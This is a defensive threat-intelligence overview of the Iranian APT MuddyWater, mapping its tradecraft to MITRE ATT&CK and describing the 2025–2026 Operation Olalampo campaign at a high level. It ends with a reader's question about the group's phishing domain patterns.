Who is MuddyWater?
A Technical Overview of the Iranian APT and the Context of Operation Olalampo
MuddyWater is a cyber-espionage group widely believed to operate on behalf of Iran’s intelligence apparatus. Security researchers and government agencies assess that the group is linked to the Iranian Ministry of Intelligence and Security (MOIS) and functions as part of the country’s state-sponsored cyber operations. The group has been active since at least 2017 and has conducted campaigns against government agencies, telecommunications companies, energy providers, defense contractors, and other critical sectors around the world.
Although MuddyWater’s operations originally focused on intelligence collection, the group has gradually expanded its toolkit and objectives. Recent campaigns suggest a shift toward more disruptive and hybrid operations that mix espionage, data theft, and destructive attacks. The 2025–2026 campaign, known as Operation Olalampo, illustrates this evolution. The operation targeted organisations across the Middle East and North Africa and introduced several new malware families and command-and-control techniques.
To understand the significance of Olalampo, it is necessary to examine MuddyWater’s historical development, operational patterns, and technical methods as mapped in the MITRE ATT&CK framework.
Origins and Attribution
Threat intelligence firms first began tracking MuddyWater activity in 2017. Multiple vendors independently discovered similar attack campaigns and later connected them to a single actor cluster. Over time, the group received many different names depending on the organisation reporting it. These include Seedworm, Static Kitten, Mercury, Mango Sandstorm, and TEMP.Zagros.
Despite the naming differences, most researchers now agree that these labels refer to the same threat actor. Evidence for this conclusion includes shared malware families, infrastructure reuse, and overlapping targeting patterns.
Government cybersecurity advisories and industry research link MuddyWater to Iranian intelligence operations. Analysts assess that the group operates under the Ministry of Intelligence and Security and supports the strategic objectives of the Iranian state.
Unlike some cybercriminal groups that focus on financial gain, MuddyWater campaigns usually align with geopolitical priorities. Targets frequently include government ministries, energy companies, telecommunications providers, and organisations connected to regional conflicts.
These characteristics place MuddyWater within the category of advanced persistent threats (APTs). APT groups differ from conventional cybercriminals in several ways. They are usually state-sponsored, operate over long time periods, and prioritize intelligence collection or strategic disruption over immediate financial profit.
Operational Goals and Targeting
MuddyWater campaigns commonly target organisations that provide strategic information or influence geopolitical events. These targets often include national governments, defence contractors, oil and gas companies, telecommunications firms, and infrastructure operators.
Geographically, the group has focused heavily on the Middle East, but it has also targeted victims in Asia, Europe, Africa, and North America.
The objectives of these campaigns typically include:
intelligence collection from government networks
monitoring political opponents or dissidents
gaining access to infrastructure systems
preparing for potential disruptive operations
In many cases, MuddyWater operations appear to serve both espionage and strategic positioning. By gaining long-term access to networks in energy, telecommunications, or government systems, the group can collect intelligence while also maintaining the ability to conduct disruptive attacks later.
MITRE ATT&CK Perspective: Core Tradecraft
The MITRE ATT&CK framework is widely used to map threat actor techniques across the lifecycle of a cyberattack. MuddyWater campaigns follow a consistent attack pattern that fits many of the ATT&CK tactics and techniques.
Initial Access
One of the group’s most common entry methods is spear-phishing. Attackers send carefully crafted emails to targeted individuals with malicious attachments or links. These attachments are often Microsoft Office documents that contain macros or embedded scripts. When the victim opens the document, the script downloads the next stage of the attack.
This behaviour corresponds to the MITRE ATT&CK technique Phishing (T1566) under the Initial Access tactic. In some cases, MuddyWater has also exploited vulnerabilities in public-facing servers. This allows the attackers to gain entry without relying on user interaction.
Execution
After gaining access, MuddyWater often uses scripting environments for code execution. PowerShell is a common tool in their operations. By running scripts directly in memory, attackers can avoid leaving obvious artefacts on disk.
This technique maps to Command and Scripting Interpreter (T1059) in MITRE ATT&CK.
Persistence
Maintaining access is a key part of APT operations. MuddyWater often installs remote management tools or custom backdoors that allow them to reconnect later.
Researchers have observed the group using legitimate remote administration tools to maintain persistence within compromised networks. Because these tools are normally used by system administrators, they can blend into normal network activity.
Defense Evasion
Defence evasion is another hallmark of MuddyWater activity. The group frequently obfuscates scripts and disguises malicious components as legitimate software. Examples include loaders that impersonate legitimate system files or hide malicious code inside trusted processes.
This behaviour corresponds to techniques such as Obfuscated Files or Information (T1027) and Masquerading (T1036).
Command and Control
Once a system is compromised, MuddyWater establishes command-and-control channels to communicate with the infected machine. These channels allow attackers to issue commands, upload tools, or exfiltrate data.
Historically, the group used standard web protocols or custom malware backdoors for command-and-control communication. More recent campaigns have experimented with alternative channels, including messaging platforms.
Malware and Tooling
Over the years, MuddyWater has used a wide range of malware families and tools. Some of these are custom-built, while others are legitimate tools repurposed for malicious activity. One early example is POWERSTATS, a PowerShell-based backdoor used as an initial stage implant in compromised systems.
The group has also deployed loaders and backdoors such as PowGoop and Mori. These components allow attackers to download additional payloads and maintain remote control over infected machines.
A notable feature of MuddyWater operations is the frequent use of “living-off-the-land” techniques. In this approach, attackers rely on built-in system tools rather than installing large amounts of malware. This reduces the forensic footprint of the attack and helps evade security monitoring systems.
In addition to custom malware, the group sometimes installs legitimate remote management tools to control victim systems. Because these tools are widely used by IT teams, their presence may not immediately trigger suspicion.
Evolution of MuddyWater Campaigns
The development of MuddyWater activity over the past decade shows a pattern of gradual capability expansion.
Early campaigns mainly focused on espionage operations targeting regional governments and telecommunications companies. These operations typically relied on spear-phishing and simple PowerShell scripts. Over time, the group began using more complex malware frameworks and multi-stage attack chains. Researchers have also observed the group experimenting with different command-and-control architectures and malware delivery mechanisms.
Another key feature of MuddyWater campaigns is infrastructure reuse. Domains and servers used in previous operations often reappear in later campaigns. This pattern has helped analysts attribute attacks to the same group even when the malware changes. The evolution of the group’s tactics suggests a maturing organisation that learns from previous operations and adapts to defensive improvements.
Operation Olalampo
Operation Olalampo represents one of the most recent and significant campaigns attributed to MuddyWater. The campaign targeted organisations across the Middle East and North Africa and began to appear in threat intelligence reporting in early 2026.
The operation followed many elements of the group’s historical playbook but also introduced new malware and infrastructure. The attack chain typically began with spear-phishing emails that contained malicious Microsoft Office documents. When the document was opened, embedded macros executed scripts that downloaded the next stage of malware.
These scripts installed downloader components that retrieved additional tools from command-and-control servers. Researchers identified several new malware families in the campaign. These included loaders and backdoors designed to provide persistent remote access to infected systems.
One of the most unusual aspects of Olalampo was the use of messaging infrastructure as part of the command-and-control system. In at least one case, a backdoor communicated with operators through a Telegram bot.
This approach can make detection more difficult because the traffic blends with legitimate communication on widely used platforms.
Another notable development in the campaign was the apparent use of artificial intelligence-assisted code generation. Researchers analysing the malware observed characteristics that suggested automated or AI-assisted development.
If accurate, this may indicate a broader shift in how threat actors develop malware.
Strategic Context of the Olalampo Campaign
The timing and targets of Operation Olalampo suggest a connection to regional geopolitical tensions. The campaign targeted organizations in the Middle East and Africa, aligning with areas where Iranian strategic interests are strong. Cybersecurity researchers have noted that Iranian cyber operations often increase during periods of political conflict or military tension. In these cases, cyber operations can serve as both intelligence gathering and indirect retaliation.
Recent analysis of Iranian cyber activity suggests that some campaigns are becoming more aggressive, including attacks designed to disrupt infrastructure or destroy data. While MuddyWater has historically focused on espionage, its newer campaigns may reflect a broader shift toward hybrid cyber operations that combine intelligence collection with disruption.
Techniques Observed in Olalampo
From a MITRE ATT&CK perspective, the Olalampo campaign demonstrates many of the techniques that have defined MuddyWater operations.
The campaign used spear-phishing for initial access and PowerShell-based loaders for execution. It also deployed multi-stage malware chains to maintain persistence and control infected systems.
Several techniques observed in the campaign include:
malicious macro execution within Office documents
staged malware downloaders
command-and-control communications through messaging platforms
reuse of previously observed infrastructure
These techniques show continuity with earlier MuddyWater campaigns while also introducing new elements such as expanded malware frameworks and novel communication channels.
Dealing with MuddyWater
The continued activity of MuddyWater illustrates several important trends in modern cyber conflict:
First, state-sponsored cyber groups are increasingly persistent and adaptive. Instead of conducting isolated attacks, groups like MuddyWater operate continuously and refine their techniques over time.
Second, the boundary between espionage and cybercrime is becoming less clear. Some Iranian operations combine intelligence gathering with financially motivated activity or destructive malware.
Finally, the use of legitimate tools and common internet services makes detection more difficult. By blending malicious traffic with normal activity, attackers can remain inside networks for long periods.
MuddyWater is one of the most active Iranian state-linked cyber threat groups. Since at least 2017, it has conducted espionage and intrusion campaigns against governments, infrastructure operators, and private companies around the world. The group’s operations follow a consistent pattern that maps well to the MITRE ATT&CK framework. Spear-phishing, PowerShell execution, living-off-the-land techniques, and persistent command-and-control channels are central elements of its tradecraft.
Operation Olalampo demonstrates how the group continues to evolve. The campaign introduced new malware variants, experimented with alternative command-and-control channels, and showed signs of AI-assisted development. While the core objective of MuddyWater remains intelligence collection, recent campaigns suggest a broader operational scope that includes disruptive and hybrid cyber operations. As geopolitical tensions continue to influence cyber activity, groups like MuddyWater are likely to remain significant actors in the global threat landscape.
The spear-phishing initial access is relevant to our work. Does the group use any particular registrar, TLD, string composition that we might use to delve into our data sets?